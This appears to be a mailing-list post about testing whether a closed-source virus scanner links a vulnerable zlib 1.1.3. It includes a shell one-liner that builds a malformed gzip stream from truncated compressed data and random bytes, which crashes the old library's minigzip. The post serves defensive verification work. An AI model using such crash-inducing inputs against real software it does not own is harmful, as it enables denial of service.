Testing zlib vulnerability

[Mathieu Lafon <Mathieu.Lafon () insalien org>]

I use a proprietary virus scanner that I higly suspect to statically use
zlib 1.1.3 (according to find-zlib.pl). The vendor tells me 'he thinks'
it is not vulnerable but i want to be sure by myself (and to force him to
release a version compiled with zlib 1.1.4).

I tried to create an evil gz file by using a standard gz header, followed
by random data and test it against minigzip (included in zlib sources).

Surprisingly, it is very easy to create a file that crash zlib :

( cat *.c | gzip -9 | dd bs=1 count=80 ; dd if=/dev/urandom bs=1 count=100 ) | ./minigzip -d
Segmentation fault

With count=80, it's only a few tries.

I also try this with zlib 1.1.4 and (hopefuly) only got
./minigzip: failed gzclose

Once i got an evil gz file, i tried my closed-source virus scanner but i have
not been able to crash it.

Is there any reason that my scanner does not crash if it uses zlib-1.1.3 ?

Does someone already try (and succeed) to crash a program this way instead of
trying to detect zlib in the binary ?

Thanks,
-- 
Mathieu Lafon